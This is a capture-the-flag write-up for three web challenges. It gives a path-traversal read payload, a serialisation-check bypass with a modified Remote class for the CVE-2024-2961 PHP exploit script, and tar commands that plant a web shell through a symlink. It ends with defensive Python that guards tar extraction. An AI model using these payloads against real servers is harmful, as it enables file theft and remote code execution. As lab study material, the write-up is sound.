web
文曲星
Debug mode can be switched on, and it has a read function. After opening the hint I got the idea: path traversal. Use:

```
action=command&content=%23read%20....//....//....//....//....//....//flag
```
serce
This one uses CVE-2024-2961 (the glibc iconv bug reachable through PHP filter chains).

```php
<?php
highlight_file(__FILE__);
$exp = $_GET["exp"];
if(isset($exp)){
    if(serialize(unserialize($exp)) != $exp){
        $data = file_get_contents($_POST['filetoread']);
        echo "File Contents: $data";
    }
}
```
The `exp` check is bypassed directly with a bare number: `unserialize("1")` returns `false`, and `serialize(false)` is `b:0;`, which is not equal to `1`, so the branch is taken. Next, change the `Remote` class in the exploit script:
```python
# Replacement Remote class for the public CVE-2024-2961 exploit script.
# That script is built on the `ten` library: Session, Response and base64
# all come from `from ten import *`.
import re

from ten import *


class Remote:
    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()

    def send(self, path: str) -> Response:
        """Sends given `path` to the HTTP server. Returns the response."""
        # exp=1 satisfies the serialize/unserialize check (see above)
        url = f"{self.url}?exp=1"
        return self.session.post(url, data={"filetoread": path})

    def download(self, path: str) -> bytes:
        """Returns the contents of a remote file."""
        path = f"php://filter/convert.base64-encode/resource={path}"
        response = self.send(path)
        # the challenge echoes "File Contents:" with a capital C
        data = response.re.search(b"File Contents: (.*)", flags=re.S).group(1)
        return base64.decode(data)
```
While solving it I kept trying to write the flag straight into /tmp, which failed. After reading the official writeup I found that /flag only has read permission.
```
ls -la > /tmp/1
/readflag > /tmp/1
```
filetoread = php://filter/convert.base64-encode/resource=/tmp/1
EZ_upload
I did not look at this one; it seems to have tested symlinks.
```php
<?php
highlight_file(__FILE__);

function handleFileUpload($file) {
    $uploadDirectory = '/tmp/';

    if ($file['error'] !== UPLOAD_ERR_OK) {
        echo '文件上传失败';
        return;
    }

    $filename = basename($file['name']);
    $filename = preg_replace('/[^a-zA-Z0-9_\-\.]/', '_', $filename);

    if (empty($filename)) {
        echo '文件名不符合要求';
        return;
    }

    $destination = $uploadDirectory . $filename;
    if (move_uploaded_file($file['tmp_name'], $destination)) {
        exec('cd /tmp && tar -xvf ' . $filename . '&&pwd');
        echo $destination;
    } else {
        echo '文件移动失败';
    }
}

handleFileUpload($_FILES['file']);
?>
```
```
ln -s /var/www/html html
tar -cvf 1.tar html
rm html
mkdir html
mv shell.php html
tar -cvf 2.tar html/shell.php
```
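As an added defender-side example (my own code, not the challenge's or the writeup's), the Python guard below checks an uploaded tar before extraction and rejects what the two-archive chain above relies on: link members, and member paths that resolve through a symlink already present in the destination to somewhere outside it. The same realpath containment check, applied to the final path handed to the file API rather than to a once-stripped string (a single-pass `../` strip is the usual reason a `....//` payload works), is the fix for the 文曲星 read function. `build_tar` constructs the test archives in memory; all function names are mine.

```python
import io, os, tarfile
# Added example (not the challenge's code): a tar guard for an upload handler like EZ_upload's.

def resolves_inside(base: str, candidate: str) -> bool:
    """True if `candidate`, after resolving symlinks, still lies under `base`.
    Apply it to the final path handed to the file API; stripping '../' once
    from user input is not a substitute."""
    base_real = os.path.realpath(base)
    return os.path.commonpath([base_real, os.path.realpath(candidate)]) == base_real

def check_archive(archive: bytes, dest: str):
    """Return a rejection reason, or None if every member is safe to extract.
    Rejects link and special members, absolute or '..' names, and names that
    resolve through a symlink already present in `dest` to outside it."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk():
                return f"link member: {m.name}"
            if not (m.isfile() or m.isdir()):
                return f"special member: {m.name}"
            if os.path.isabs(m.name) or ".." in m.name.split("/"):
                return f"unsafe name: {m.name}"
            if not resolves_inside(dest, os.path.join(dest, m.name)):
                return f"escapes destination: {m.name}"
    return None

def safe_extract(archive: bytes, dest: str) -> list:
    """Extract into `dest` only after the whole archive passed check_archive()."""
    reason = check_archive(archive, dest)
    if reason:
        raise ValueError(reason)
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        # use the stdlib 'data' filter as a second line of defence where available
        tar.extractall(dest, **({"filter": "data"} if hasattr(tarfile, "data_filter") else {}))
        return [m.name for m in tar.getmembers()]

def build_tar(entries) -> bytes:
    """Constructed test archive from (name, kind, payload) tuples; kind is 'file' or 'symlink'."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, payload in entries:
            info = tarfile.TarInfo(name)
            if kind == "symlink":
                info.type, info.linkname = tarfile.SYMTYPE, payload
                tar.addfile(info)
            else:
                data = payload.encode()
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()
```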